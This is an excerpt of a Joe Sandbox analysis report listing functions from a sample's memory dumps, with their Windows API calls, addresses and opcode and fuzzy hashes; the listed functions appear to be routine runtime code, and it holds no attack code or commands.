Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFDA5802630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDA580264C
RtlCaptureContext.KERNEL32 ref: 00007FFDA5802679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDA5802693
RtlVirtualUnwind.KERNEL32 ref: 00007FFDA58026D4
IsDebuggerPresent.KERNEL32 ref: 00007FFDA5802728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDA5802745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDA5802750

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 5955d19d1dc02ef8bb6cb2c337fbaed50c4b8b0680faf509287583dba8332b8e
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 3B315A7270AB858AEB608F71E8503E97361FB85B48F44413AEA4F47B96DF78C648C714

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFDA58076E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFDA5807759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDA5807771
RtlVirtualUnwind.KERNEL32 ref: 00007FFDA58077AC
IsDebuggerPresent.KERNEL32 ref: 00007FFDA58077E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDA58077EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDA58077FA

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 5e54f6deab349d7735c66581d06a15bad1e0342689024e4ded918fd5ef871c85
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: BA315E32719B8586DB60CB35E8503AE73A4FB89B94F500275EA9E43B96DF38D145CB04

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFDA5810248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFDA5810497
RaiseException.KERNEL32 ref: 00007FFDA58104A8

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 2d6f9f8070ed07352bef864fd876911adeedb99b824c43929c7989a6ce21b0ad
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 3BB17773A01B88CBEB15CF29C89636C3BA0F785F48F148962DA5D877A5CB39D451C704

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFDA580A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 4c6c6bfec2b1742ca13e302e1df4bc1b6eab7c91be618b6b08a47694c8bc9688
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 2F51E422B0969585FB20DB72A8542AE7BA4BF42FD4F144274EE5D27B9ADE3CD401C708

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

